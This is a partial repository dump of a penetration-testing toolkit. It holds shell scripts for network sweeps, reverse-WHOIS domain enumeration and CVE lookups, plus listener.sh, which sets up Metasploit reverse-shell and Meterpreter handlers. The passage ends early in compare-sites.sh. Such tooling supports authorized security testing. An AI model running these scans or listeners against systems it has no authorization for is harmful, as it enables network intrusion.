├── .gitignore
├── LICENSE.txt
├── README.md
├── api-scanner.sh
├── cloud-scanner.sh
├── config
    ├── install.sh
    ├── tmux.conf
    ├── vimrc
    ├── win10.choco
    └── zshrc
├── container-scanner.sh
├── cve.sh
├── directObjectRef.sh
├── discover.sh
├── domain.sh
├── generateTargets.sh
├── listener.sh
├── misc
    ├── compare-sites.sh
    ├── crack-wifi.sh
    ├── crawl.sh
    ├── deploy
    │   ├── ansible
    │   │   └── redirector-c2.yml
    │   ├── main.tf
    │   └── outputs.tf
    ├── dns-forward.sh
    ├── dns-reverse.sh
    ├── dns-transfer.sh
    ├── enum-linux.sh
    ├── netblocks.sh
    ├── netblocks.txt
    ├── ping-sweep.sh
    ├── rebrand.sh
    ├── recon-ng.sh
    ├── subdomains-from-ssl.sh
    └── wtf.sh
├── msf-aux.sh
├── multiTabs.sh
├── newModules.sh
├── nikto.sh
├── notes
    ├── Cobalt-Strike.txt
    ├── PowerShell
    │   ├── Empire.txt
    │   ├── PS-Attack.txt
    │   ├── PowerView.txt
    │   └── basic.txt
    ├── Python
    │   ├── ex1.py
    │   ├── fuzzer-pop3.py
    │   ├── notes.txt
    │   ├── scrape.py
    │   └── test.py
    ├── active-directory.txt
    ├── bash.txt
    ├── buffer-overflows.txt
    ├── cidr.txt
    ├── consulting.txt
    ├── databases.txt
    ├── dns.txt
    ├── egress.txt
    ├── empire.txt
    ├── exploits.txt
    ├── forensics.txt
    ├── git.txt
    ├── insecure-protocols.txt
    ├── kali.txt
    ├── ldap-owa.txt
    ├── linux.txt
    ├── maltego.txt
    ├── metasploit.txt
    ├── mobile.txt
    ├── nexpose.txt
    ├── nmap-fire.txt
    ├── open-redirect.txt
    ├── osx.txt
    ├── passwords.txt
    ├── pwk.txt
    ├── shodan.txt
    ├── smtp.txt
    ├── snmp.txt
    ├── ssl-setup.txt
    ├── ssl.txt
    ├── terraform.txt
    ├── ubuntu.txt
    ├── web-apps.txt
    └── windows.txt
├── nse.sh
├── oauth-jwt-scanner.sh
├── openredirect-scanner.py
├── openredirect.sh
├── parse.sh
├── parsers
    ├── parse-burp.py
    ├── parse-nessus-feed.py
    ├── parse-nessus.py
    ├── parse-nexpose.py
    ├── parse-nipper.py
    ├── parse-nmap.py
    ├── parse-qualys.py
    └── utfdictcsv.py
├── passive.sh
├── payload.sh
├── person.sh
├── report.sh
├── report
    ├── assets
    │   ├── css
    │   │   ├── bootstrap.min.css
    │   │   └── styles.css
    │   ├── fonts
    │   │   ├── FontAwesome.otf
    │   │   ├── fontawesome-webfont.eot
    │   │   ├── fontawesome-webfont.svg
    │   │   ├── fontawesome-webfont.ttf
    │   │   ├── fontawesome-webfont.woff
    │   │   ├── ironvue-icons.eot
    │   │   ├── ironvue-icons.svg
    │   │   ├── ironvue-icons.ttf
    │   │   ├── ironvue-icons.woff
    │   │   └── ironvue-icons.woff2
    │   ├── images
    │   │   ├── banner.svg
    │   │   ├── icons
    │   │   │   ├── fail.png
    │   │   │   ├── info.png
    │   │   │   ├── pass.png
    │   │   │   └── warn.png
    │   │   └── logo.png
    │   └── javascript
    │   │   ├── bootstrap.min.js
    │   │   ├── jquery.min.js
    │   │   └── less.min.js
    ├── data
    │   ├── doc.htm
    │   ├── emails.htm
    │   ├── hosts.htm
    │   ├── names.htm
    │   ├── passive-recon.htm
    │   ├── pdf.htm
    │   ├── ppt.htm
    │   ├── records.htm
    │   ├── registered-domains.htm
    │   ├── squatting.htm
    │   ├── subdomains.htm
    │   ├── summary.htm
    │   ├── txt.htm
    │   ├── whois-domain.htm
    │   ├── whois-ip.htm
    │   └── xls.htm
    ├── index.htm
    └── pages
    │   ├── config.htm
    │   ├── doc.htm
    │   ├── emails.htm
    │   ├── hosts.htm
    │   ├── maps.htm
    │   ├── names.htm
    │   ├── passive-recon.htm
    │   ├── pdf.htm
    │   ├── ppt.htm
    │   ├── records.htm
    │   ├── registered-domains.htm
    │   ├── squatting.htm
    │   ├── subdomains.htm
    │   ├── summary.htm
    │   ├── txt.htm
    │   ├── whois-domain.htm
    │   ├── whois-ip.htm
    │   └── xls.htm
├── resource
    ├── 1099-rmi.rc
    ├── 110-pop3.rc
    ├── 111-rpc.rc
    ├── 1158-oracle.rc
    ├── 123-udp-ntp.rc
    ├── 13364-rosewill.rc
    ├── 135-dcerpc.rc
    ├── 137-udp-netbios.rc
    ├── 1414-ibm-mq.rc
    ├── 143-imap.rc
    ├── 1433-mssql.rc
    ├── 1521-oracle.rc
    ├── 1604-udp-citrix.rc
    ├── 161-udp-snmp.rc
    ├── 17185-udp-vxworks.rc
    ├── 1720-h323.rc
    ├── 19-chargen.rc
    ├── 1900-udp-upnp.rc
    ├── 20256-unitronics.rc
    ├── 2049-nfs.rc
    ├── 21-ftp.rc
    ├── 22-ssh.rc
    ├── 23-telnet.rc
    ├── 2362-udp-scada.rc
    ├── 25-smtp.rc
    ├── 28784-scada.rc
    ├── 3000-emc.rc
    ├── 3050-borland.rc
    ├── 30718-telnet.rc
    ├── 3306-mysql.rc
    ├── 3310-clamav.rc
    ├── 3389-rdp.rc
    ├── 3500-emc.rc
    ├── 37777-dahua-dvr.rc
    ├── 407-udp-motorola.rc
    ├── 443-vmware.rc
    ├── 445-smb.rc
    ├── 465-smtp.rc
    ├── 46824-scada.rc
    ├── 4786-cisco-smart-install.rc
    ├── 4800-udp-moxa.rc
    ├── 5000-satel.rc
    ├── 50000-db2.rc
    ├── 502-scada.rc
    ├── 5040-dcerpc.rc
    ├── 5060-sip.rc
    ├── 5060-udp-sip.rc
    ├── 512-rexec.rc
    ├── 513-rlogin.rc
    ├── 514-rshell.rc
    ├── 523-udp-db2.rc
    ├── 5432-postgres.rc
    ├── 548-afp.rc
    ├── 5560-oracle.rc
    ├── 5631-pcanywhere.rc
    ├── 5632-pcanywhere.rc
    ├── 5900-vnc.rc
    ├── 5920-cctv.rc
    ├── 5984-couchdb.rc
    ├── 5985-winrm.rc
    ├── 6000-5-x11.rc
    ├── 623-udp-ipmi.rc
    ├── 6379-redis.rc
    ├── 69-tftp.rc
    ├── 771-scada.rc
    ├── 7777-backdoor.rc
    ├── 79-finger.rc
    ├── 8000-canon.rc
    ├── 8080-oracle.rc
    ├── 8080-tomcat.rc
    ├── 8222-vmware.rc
    ├── 831-easycafe.rc
    ├── 8400-adobe.rc
    ├── 8834-nessus.rc
    ├── 9000-sharp.rc
    ├── 902-vmware.rc
    ├── 9084-vmware.rc
    ├── 9100-printers.rc
    ├── 998-zenworks.rc
    ├── 9999-telnet.rc
    ├── http.rc
    ├── java.rc
    ├── listener.rc
    ├── post-linux.rc
    ├── post-osx.rc
    ├── post-windows.rc
    ├── recon-ng-cleanup.rc
    ├── recon-ng-import-emails.rc
    ├── recon-ng-import-ips.rc
    ├── recon-ng-import-names.rc
    └── recon-ng.rc
├── sensitive-scanner.sh
├── ssl.sh
├── update.sh
├── waf-detect.sh
└── web-api-scanner.sh


/.gitignore:
--------------------------------------------------------------------------------
1 | .idea/*
2 | __pycache__/


--------------------------------------------------------------------------------
/LICENSE.txt:
--------------------------------------------------------------------------------
 1 | The MIT License (MIT)
 2 | 
 3 | Copyright (c) 2007-2025 Lee Baird
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in
13 | all copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
21 | THE SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/config/install.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | cp tmux.conf "$HOME"/.tmux.conf
 4 | cp vimrc "$HOME"/.vimrc
 5 | 
 6 | if grep -iq "kali" /etc/os-release; then
 7 |     cat zshrc >> "$HOME"/.zshrc
 8 |     source "$HOME"/.zshrc 2>/dev/null
 9 | else
10 |     cp zshrc "$HOME"/.bash_aliases
11 |     source "$HOME"/.bash_aliases
12 | fi
13 | 


--------------------------------------------------------------------------------
/config/tmux.conf:
--------------------------------------------------------------------------------
 1 | # change the prefix from 'C-b' to 'C-a'
 2 | # (remap capslock to CTRL for easy access)
 3 | unbind C-b
 4 | set -g prefix C-a
 5 | bind C-a send-prefix
 6 | 
 7 | # start with window 1 (instead of 0)
 8 | set -g base-index 1
 9 | 
10 | # start with pane 1
11 | set -g pane-base-index 1
12 | 
13 | # split panes using | and -, make sure they open in the same path
14 | bind | split-window -h -c "#{pane_current_path}"
15 | bind - split-window -v -c "#{pane_current_path}"
16 | 
17 | unbind '"'
18 | unbind %
19 | 
20 | # open new windows in the current path
21 | bind c new-window -c "#{pane_current_path}"
22 | 
23 | # reload config file
24 | bind r source-file ~/.tmux.conf
25 | 
26 | unbind p
27 | bind p previous-window
28 | 
29 | # shorten command delay
30 | set -sg escape-time 1
31 | 
32 | # don't rename windows automatically
33 | set -g allow-rename off
34 | 
35 | # mouse control (clickable windows, panes, resizable panes)
36 | set -g mouse on
37 | 
38 | # Use Alt-arrow keys without prefix key to switch panes
39 | bind -n M-Left select-pane -L
40 | bind -n M-Right select-pane -R
41 | bind -n M-Up select-pane -U
42 | bind -n M-Down select-pane -D
43 | 
44 | # enable vi mode keys
45 | set-window-option -g mode-keys vi
46 | 
47 | # set default terminal mode to 256 colors
48 | set -g default-terminal "xterm-256color"
49 | set -ga terminal-overrides ",xterm-256color:Tc"
50 | 
51 | # present a menu of URLs to open from the visible pane. sweet.
52 | bind u capture-pane \;\
53 |     save-buffer /tmp/tmux-buffer \;\
54 |     split-window -l 10 "urlview /tmp/tmux-buffer"
55 | 
56 | 
57 | ######################
58 | ### DESIGN CHANGES ###
59 | ######################
60 | 
61 | # loud or quiet?
62 | set -g visual-activity off
63 | set -g visual-bell off
64 | set -g visual-silence off
65 | setw -g monitor-activity off
66 | set -g bell-action none
67 | 
68 | #  modes
69 | setw -g clock-mode-colour colour1
70 | setw -g mode-style 'fg=colour0 bg=colour1 bold'
71 | 
72 | # panes
73 | set -g pane-border-style 'fg=colour1'
74 | set -g pane-active-border-style 'fg=colour3'
75 | 
76 | # statusbar
77 | set -g status-position bottom
78 | set -g status-justify left
79 | set -g status-style 'fg=colour1'
80 | set -g status-left ''
81 | set -g status-right '%Y-%m-%d %H:%M '
82 | set -g status-right-length 50
83 | set -g status-left-length 10
84 | 
85 | setw -g window-status-current-style 'fg=colour0 bg=colour1 bold'
86 | setw -g window-status-current-format ' #I #W #F '
87 | 
88 | setw -g window-status-style 'fg=colour1 dim'
89 | setw -g window-status-format ' #I #[fg=colour7]#W #[fg=colour1]#F '
90 | 
91 | setw -g window-status-bell-style 'fg=colour2 bg=colour1 bold'
92 | 
93 | # messages
94 | set -g message-style 'fg=colour2 bg=colour0 bold'
95 | 


--------------------------------------------------------------------------------
/config/vimrc:
--------------------------------------------------------------------------------
 1 | 
 2 | set number                         " Show line numbers
 3 | syntax on                          " Syntax highlighting
 4 | 
 5 | set ignorecase                     " Search is case-insensitive
 6 | set hlsearch                       " Highlight search matches
 7 | set incsearch                      " Highlight first matches of searches while typing
 8 | 
 9 | set expandtab                      " Insert spaces instead of tabs
10 | set shiftwidth=5                   " Tab = 5 spaces
11 | set softtabstop=5                  " Tab = 5 spaces
12 | set backspace=indent,eol,start     " Modern backspace behavior
13 | 
14 | 


--------------------------------------------------------------------------------
/config/zshrc:
--------------------------------------------------------------------------------
 1 | 
 2 | # -----------------------------------------------------------------------------------------------
 3 | 
 4 | DNS=$(ip r | grep dhcp | awk '{print $3}')
 5 | EXTIP=$(curl -s http://ifconfig.me)
 6 | INTERFACE=$(ip a | grep BROADCAST | awk '{print $2}' | cut -d ":" -f1)
 7 | MYIP=$(hostname -I | awk '{print $1}')
 8 | MAC=$(ip a | grep ether | awk '{print $2}')
 9 | 
10 | alias bh='neo4j console & ; sleep 6 ; bloodhound'
11 | alias c='clear'
12 | alias cl='clear ; ls -lh --color=auto'
13 | alias cla='clear ; ls -lah --color=auto'
14 | alias d='cd $HOME/Desktop/ ; clear'
15 | alias date='date +"%a %b %d, %Y - %r %Z"'
16 | alias e='exit'
17 | alias k='cd /home/kali/'
18 | alias kd='cd /home/kali/Desktop/'
19 | alias l='ls -lh'
20 | alias la='ls -lah'
21 | alias lc='ls -1 | wc -l'
22 | alias m='sudo service postgresql start ; sudo msfdb init ; msfconsole'
23 | alias n='echo; date ; echo ;
24 | echo -n "External IP:  "$EXTIP ; echo ;
25 | echo -n "Internal IP:  "$MYIP ; echo ;
26 | echo -n "MAC address:  "$MAC ; echo ;
27 | echo -n "DNS:          "$DNS ; echo ;
28 | echo -n "Interfaace:   "$INTERFACE ; echo ;
29 | echo ; netstat -antp; echo ;
30 | ping -c3 8.8.8.8'
31 | alias r='cd $HOME ; clear'
32 | alias s='cd ~/discover/ ; clear'
33 | alias smb='impacket-smbserver share . -smb2support'
34 | alias sip='sort -n -u -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4'
35 | alias ssh='ssh -o "XAuthLocation=/opt/X11/bin/xauth"'
36 | alias update='sudo ~/discover/update.sh'
37 | alias upload='cd $HOME/Desktop/ ; raven $MYIP 3000 --upload-dir $HOME/Desktop/'
38 | alias web='echo $MYIP ; python3 -m http.server 80'
39 | alias web2='echo $MYIP ; python3 -m http.server 8000'
40 | 
41 | export GOPATH=/opt/go
42 | export GOROOT=/usr/lib/go
43 | export PATH=$PATH:/usr/lib/go/bin:/opt/go/bin
44 | 


--------------------------------------------------------------------------------
/cve.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env bash
 2 | 
 3 | # by Lee Baird (@discoverscripts)
 4 | 
 5 | # Check if Firefox is running
 6 | if pgrep firefox > /dev/null; then
 7 |     echo
 8 |     echo "[!] Close Firefox before running script."
 9 |     echo
10 |     exit 1
11 | fi
12 | 
13 | echo
14 | echo
15 | echo "Search for info on a CVE."
16 | echo
17 | echo -n "CVE: "
18 | read -r CVE
19 | echo
20 | 
21 | # Check for a valid CVE
22 | if [[ ! $CVE =~ ^CVE-[0-9]{4}-[0-9]{4,6}$ ]]; then
23 |     echo
24 |     echo "[!] Invalid format."
25 |     echo
26 |     exit 1
27 | fi
28 | 
29 | urls=(
30 |     "https://nvd.nist.gov/vuln/detail/$CVE"
31 |     "https://www.cvedetails.com/cve/$CVE"
32 |     "https://vulners.com/search?query=$CVE"
33 |     "https://www.tenable.com/cve/$CVE"
34 |     "https://cve.mitre.org/cgi-bin/cvename.cgi?name=$CVE"
35 |     "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?search_api_fulltext=$CVE"
36 |     "https://www.google.com/search?q=%22$CVE%22+AND+exploit"
37 |     "https://www.rapid7.com/db/?q=$CVE&type=nexpose"
38 | )
39 | 
40 | # Open each URL in a new tab
41 | for url in "${urls[@]}"; do
42 |     xdg-open "$url" &
43 |     sleep 2
44 | done
45 | 


--------------------------------------------------------------------------------
/directObjectRef.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env bash
 2 | 
 3 | # by Lee Baird (@discoverscripts)
 4 | 
 5 | clear
 6 | f_banner
 7 | 
 8 | echo -e "${BLUE}Using Burp, authenticate to a site, map & Spider, then log out.${NC}"
 9 | echo -e "${BLUE}Target > Site map > select the URL > right click > Copy URLs in${NC}"
10 | echo -e "${BLUE}this host. Paste the results into a new file.${NC}"
11 | 
12 | echo
13 | echo -n "Enter the location of your file: "
14 | read -r LOCATION
15 | 
16 | # Check for no answer
17 | if [ -z "$LOCATION" ]; then
18 |     f_error
19 | fi
20 | 
21 | # Check for wrong answer
22 | if [ ! -f "$LOCATION" ]; then
23 |     f_error
24 | fi
25 | 
26 | ###############################################################################################################################
27 | 
28 | while read -r i; do
29 |     curl -sk -w "%{http_code} - %{url_effective} \\n" "$i" -o /dev/null 2>&1 | tee -a tmp
30 | done < "$LOCATION"
31 | 
32 | cat tmp | sort -u > DirectObjectRef.txt
33 | mv DirectObjectRef.txt "$HOME"/data/DirectObjectRef.txt
34 | rm tmp
35 | 
36 | echo
37 | echo "$MEDIUM"
38 | echo
39 | echo "[*] Scan complete."
40 | echo
41 | echo -e "The new report is located at ${YELLOW}$HOME/data/DirectObjectRef.txt${NC}"
42 | 


--------------------------------------------------------------------------------
/domain.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env bash
 2 | 
 3 | # by Lee Baird (@discoverscripts)
 4 | 
 5 | clear
 6 | f_banner
 7 | 
 8 | echo -e "${BLUE}RECON${NC}"
 9 | echo
10 | echo "1.  Passive"
11 | echo "2.  Find registered domains"
12 | echo "3.  Previous menu"
13 | echo
14 | echo -n "Choice: "
15 | read -r CHOICE
16 | 
17 | case "$CHOICE" in
18 |     1) "$DISCOVER"/passive.sh && exit ;;
19 |     2)
20 |         clear
21 |         f_banner
22 | 
23 |         echo -e "${BLUE}Find registered domains.${NC}"
24 |         echo
25 |         echo "Open a browser to https://www.reversewhois.io/"
26 |         echo "Enter your domain and solve the captcha."
27 |         echo "Select all > copy all of the text and paste into a new file."
28 | 
29 |         f_location
30 |         echo
31 |         grep '^[0-9]' "$LOCATION" | awk '{print $2}' | sort -u > tmp
32 |         TOTAL=$(wc -l tmp | sed -e 's/^[ \t]*//' | cut -d ' ' -f1)
33 | 
34 |         while read -r REGDOMAIN; do
35 |             IPADDR=$(dig +short "$REGDOMAIN" | grep -Eiv '(0.0.0.0|127.0.0.1|127.0.0.6)' | sed '/[a-z]/d')
36 |             whois -H "$REGDOMAIN" | grep -Eiv '(#|please query|personal data|redacted|whois|you agree)' | sed '/^$/d' > tmp2
37 |             wait
38 | 
39 |             REGEMAIL=$(grep 'Registrant Email:' tmp2 | cut -d ' ' -f3 | tr '[:upper:]' '[:lower:]')
40 | 
41 |             if [[ "$REGEMAIL" == *'abuse'* || "$REGEMAIL" == *'anonymize.com'* || "$REGEMAIL" == *'buydomains.com'* || "$REGEMAIL" == *'cloudflareregistrar.com'* || "$REGEMAIL" == *'contact-form'* || "$REGEMAIL" == *'contact.gandi.net'* || "$REGEMAIL" == *'csl-registrar.com'* || "$REGEMAIL" == *'domaindiscreet.com'* || "$REGEMAIL" == *'dynadot.com'* || "$REGEMAIL" == *'email'* || "$REGEMAIL" == *'gname.com'* || "$REGEMAIL" == *'google.com'* || "$REGEMAIL" == *'identity-protect.org'* || "$REGEMAIL" == *'meshdigital.com'* || "$REGEMAIL" == *'mydomainprovider.com'* || "$REGEMAIL" == *'myprivatename.com'* || "$REGEMAIL" == *'networksolutionsprivateregistration'* || "$REGEMAIL" == *'please'* || "$REGEMAIL" == *'p.o-w-o.info'* || "$REGEMAIL" == *'privacy'* || "$REGEMAIL" == *'Redacted'* || "$REGEMAIL" == *'redacted'* || "$REGEMAIL" == *'select'* || "$REGEMAIL" == *'tieredaccess.com'* ]]; then
42 |                 REGEMAIL=''
43 |             fi
44 | 
45 |             REGORG=$(grep 'Registrant Organization:' tmp2 | cut -d ':' -f2 | cut -d ' ' -f2- | sed 's/     //g; s/administration/Administration/g; s/Anonymize, Inc/Anonymize Inc/g; s/By /by /g; s/, Corp/ Corp/g; s/Data Protected//g; s/family/Family/g; s/Identity Protect Limited//g; s/Identity Protection Service//g; s/, Inc. / Inc/g; s/, Inc/ Inc/g; s/, Inc /Inc/g; s/Inc./Inc/g; s/INFORMATION SYSTEMS AND MANAGEMENT CONSLANTS/Information Systems and Management Consultants/g; s/INSTITUTE/Institute/g; s/, LLC/ LLC/g; s/MEMORIAL/Memorial/g; s/, N.A./ N.A./g; s/N\/A//g; s/Not Disclosed//g; s/None//g; s/NULL//g; s/ (NYHQ)//g; s/Redacted for privacy//g; s/S.L./SL/g; s/Statutory Masking Enabled//g; s/UNIVERSITY/University/g; s/(US) //g; s/WEST VIRGINIA/West Virginia/g')
46 | 
47 |             if [[ "$REGORG" == *'Privacy'* || "$REGORG" == *'PRIVACY'* ]]; then
48 |                     REGORG=''
49 |             fi
50 | 
51 |             REGISTRAR=$(grep 'Registrar:' tmp2 | cut -d ' ' -f2- | sed 's/Co.,/Co./g; s/Corp.,/Corp/g; s/Hongkong/Hong Kong/g; s/Identity Protection Service//g; s/Gransy,/Gransy/g; s/, Inc/ Inc/g; s/Inc./Inc/g; s/IncUSA/Inc/g; s/KEY-SYSTEMS/Key-Systems/g; s/Limited,/Ltd /g; s/, LLC/ LLC/g; s/Ltd./Ltd/g; s/, Ltd/ Ltd/g; s/MARKMONITOR/MarkMonitor/g; s/MarkMonitor./MarkMonitor /g; s/Registrar://g; s/REGISTRAR OF DOMAIN NAMES//g; s/s.l./SL/g; s/, S.L./SL/g; s/technologies/Technologies/g; s/technology/Technology/g; s/^[ \t]*//' | head -n1)
52 | 
53 |             if [[ "$REGISTRAR" == 'Domains' ]]; then
54 |                 REGISTRAR=''
55 |             fi
56 | 
57 |             echo "$REGDOMAIN,$IPADDR,$REGEMAIL,$REGORG,$REGISTRAR" | grep -v ',,,,' >> tmp3
58 |             ((NUMBER+1))
59 |             echo -ne "$NUMBER of $TOTAL domains"\\r
60 |             sleep 2
61 |         done < tmp
62 | 
63 |         echo "Domain,IP Address,Registration Email,Registration Org,Registrar" > tmp4
64 |         cat tmp4 tmp3 | grep -Ev '^\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' | column -t -s ',' | sed 's/[ \t]*$//' > "$HOME"/data/registered-domains
65 |         rm tmp*
66 | 
67 |         echo
68 |         echo "$MEDIUM"
69 |         echo
70 |         echo "[*] Scan complete."
71 |         echo
72 |         echo -e "The report is located at ${YELLOW}$HOME/data/registered-domains${NC}"
73 |         echo
74 |         exit
75 |         ;;
76 |     3) f_main ;;
77 |     *) echo; echo -e "${RED}[!] Invalid choice or entry, try again.${NC}"; echo; sleep 2; "$DISCOVER"/domain.sh ;;
78 | esac
79 | 


--------------------------------------------------------------------------------
/generateTargets.sh:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env bash
  2 | 
  3 | # by Lee Baird (@discoverscripts)
  4 | 
  5 | f_targets(){
  6 |     clear
  7 |     f_banner
  8 | 
  9 |     echo -e "${BLUE}SCANNING${NC}"
 10 |     echo
 11 |     echo "1.  ARP scan"
 12 |     echo "2.  Ping sweep"
 13 |     echo "3.  Previous menu"
 14 |     echo
 15 |     echo -n "Choice: "
 16 |     read -r CHOICE
 17 | 
 18 |     case "$CHOICE" in
 19 |         1) f_arpscan ;;
 20 |         2) f_pingsweep ;;
 21 |         3) f_main ;;
 22 |         *) echo; echo -e "${RED}[!] Invalid choice or entry, try again.${NC}"; echo; sleep 2; "$DISCOVER"/generateTargets.sh ;;
 23 |     esac
 24 | }
 25 | 
 26 | ###############################################################################################################################
 27 | 
 28 | f_arpscan(){
 29 |     echo
 30 |     echo "[*] Scanning"
 31 | 
 32 |     sudo arp-scan --localnet | grep -Eiv '(interface|arp-scan|packets)' > tmp
 33 |     sed '/^$/d' tmp | grep -v "$MYIP" | sort -t ' ' -k 1,1 -V > "$HOME"/data/arp-scan.txt
 34 |     awk '{print $1}' tmp | grep -v "$MYIP" | $SIP | sed '/^$/d' > "$HOME"/data/arp-scan-targets.txt
 35 |     rm tmp
 36 | 
 37 |     echo
 38 |     echo "$MEDIUM"
 39 |     echo
 40 |     echo "[*] Scan complete."
 41 |     echo
 42 |     echo -e "The new report is located at ${YELLOW}$HOME/data/arp-scan.txt${NC}"
 43 |     echo
 44 |     exit
 45 | }
 46 | 
 47 | ###############################################################################################################################
 48 | 
 49 | f_pingsweep(){
 50 |     echo
 51 |     echo -e "${BLUE}Type of input:${NC}"
 52 |     echo
 53 |     echo "1.  List containing IPs, ranges, and/or CIDRs."
 54 |     echo "2.  Manual"
 55 |     echo
 56 |     echo -n "Choice: "
 57 |     read -r CHOICE
 58 | 
 59 |     case "$CHOICE" in
 60 |         1)
 61 |             f_location
 62 | 
 63 |             echo
 64 |             echo "[*] Scanning"
 65 |             nmap -sn -PS -PE --stats-every 10s -iL "$LOCATION" > tmp
 66 |             ;;
 67 |         2)
 68 |             echo
 69 |             echo -n "Enter a CIDR: "
 70 |             read -r CIDR
 71 | 
 72 |             # Check for no answer
 73 |             if [ -z "$CIDR" ]; then
 74 |                 f_error
 75 |             fi
 76 | 
 77 |             # Check for a valid CIDR
 78 |             if [[ ! "$CIDR" =~ ^([0-9]{1,3}\.){3}[0-9]{1,3}\/[0-9]+$ ]]; then
 79 |                 f_error
 80 |             fi
 81 | 
 82 |             echo
 83 |             echo "[*] Scanning"
 84 |             nmap -sn -PS -PE --stats-every 10s "$CIDR" > tmp
 85 |             ;;
 86 |         *)
 87 |             echo; echo -e "${RED}[!] Invalid choice or entry, try again.${NC}"; echo; sleep 2; "$DISCOVER"/generateTargets.sh ;;
 88 |     esac
 89 | 
 90 |     grep -oE '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' tmp | grep -v "$MYIP" | $SIP > "$HOME"/data/pingsweep.txt
 91 |     rm tmp
 92 | 
 93 |     echo
 94 |     echo "$MEDIUM"
 95 |     echo
 96 |     echo "[*] Scan complete."
 97 |     echo
 98 |     echo -e "The new report is located at ${YELLOW}$HOME/data/pingsweep.txt${NC}"
 99 |     echo
100 |     exit
101 | }
102 | 
103 | ###############################################################################################################################
104 | 
105 | while true; do f_targets; done
106 | 


--------------------------------------------------------------------------------
/listener.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env bash
 2 | 
 3 | # by Lee Baird (@discoverscripts)
 4 | 
 5 | clear
 6 | f_banner
 7 | 
 8 | echo -e "${BLUE}Metasploit Listeners${NC}"
 9 | echo
10 | echo "1.   android/meterpreter/reverse_tcp"
11 | echo "2.   cmd/windows/reverse_powershell"
12 | echo "3.   java/jsp_shell_reverse_tcp"
13 | echo "4.   linux/x64/meterpreter_reverse_https"
14 | echo "5.   linux/x64/meterpreter_reverse_tcp"
15 | echo "6.   linux/x64/shell/reverse_tcp"
16 | echo "7.   osx/x64/meterpreter_reverse_https"
17 | echo "8.   osx/x64/meterpreter_reverse_tcp"
18 | echo "9.   php/meterpreter/reverse_tcp"
19 | echo "10.  python/meterpreter_reverse_https"
20 | echo "11.  python/meterpreter_reverse_tcp"
21 | echo "12.  windows/x64/meterpreter_reverse_https"
22 | echo "13.  windows/x64/meterpreter_reverse_tcp"
23 | echo "14.  Previous menu"
24 | echo
25 | echo -n "Choice: "
26 | read -r CHOICE
27 | 
28 | case "$CHOICE" in
29 |     1) PAYLOAD="android/meterpreter/reverse_tcp" ;;
30 |     2) PAYLOAD="cmd/windows/reverse_powershell" ;;
31 |     3) PAYLOAD="java/jsp_shell_reverse_tcp" ;;
32 |     4) PAYLOAD="linux/x64/meterpreter_reverse_https" ;;
33 |     5) PAYLOAD="linux/x64/meterpreter_reverse_tcp" ;;
34 |     6) PAYLOAD="linux/x64/shell/reverse_tcp" ;;
35 |     7) PAYLOAD="osx/x64/meterpreter_reverse_https" ;;
36 |     8) PAYLOAD="osx/x64/meterpreter_reverse_tcp" ;;
37 |     9) PAYLOAD="php/meterpreter/reverse_tcp" ;;
38 |     10) PAYLOAD="python/meterpreter_reverse_https" ;;
39 |     11) PAYLOAD="python/meterpreter_reverse_tcp" ;;
40 |     12) PAYLOAD="windows/x64/meterpreter_reverse_https" ;;
41 |     13) PAYLOAD="windows/x64/meterpreter_reverse_tcp" ;;
42 |     14) f_main ;;
43 |     *) echo; echo -e "${RED}[!] Invalid choice or entry, try again.${NC}"; echo; sleep 2; "$DISCOVER"/listener.sh ;;
44 | esac
45 | 
46 | echo
47 | echo -n "LHOST: "
48 | read -r LHOST
49 | 
50 | # Check for no answer
51 | if [ -z "$LHOST" ]; then
52 |     LHOST="$MYIP"
53 |     echo "[*] Using $MYIP"
54 |     echo
55 | fi
56 | 
57 | echo -n "LPORT: "
58 | read -r LPORT
59 | 
60 | # Check for no answer
61 | if [ -z "$LPORT" ]; then
62 |     LPORT=443
63 |     echo "[*] Using 443"
64 | fi
65 | 
66 | # Check for valid port number.
67 | if [[ "$LPORT" -lt 1 || "$LPORT" -gt 65535 ]]; then
68 |     f_error
69 | fi
70 | 
71 | # Check for root when binding to a low port
72 | if [[ "$LPORT" -lt 1025 && "$(id -u)" != "0" ]]; then
73 |     echo
74 |     echo "[!] You must be root to bind to a port below 1025."
75 |     echo
76 |     exit 1
77 | fi
78 | 
79 | cp "$DISCOVER"/resource/listener.rc /tmp/
80 | 
81 | sed -i "s|aaa|$PAYLOAD|g" /tmp/listener.rc
82 | sed -i "s/bbb/$LHOST/g" /tmp/listener.rc
83 | sed -i "s/ccc/$LPORT/g" /tmp/listener.rc
84 | 
85 | echo
86 | msfconsole -q -r /tmp/listener.rc
87 | 


--------------------------------------------------------------------------------
/misc/compare-sites.sh:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env bash
  2 | 
  3 | # by Lee Baird (@discoverscripts)
  4 | 
  5 | DIR=$HOME/compare-sites
  6 | DIFFONLY=false
  7 | MEDIUM='=================================================================='
  8 | 
  9 | BLUE='\033[1;34m'
 10 | RED='\033[1;31m'
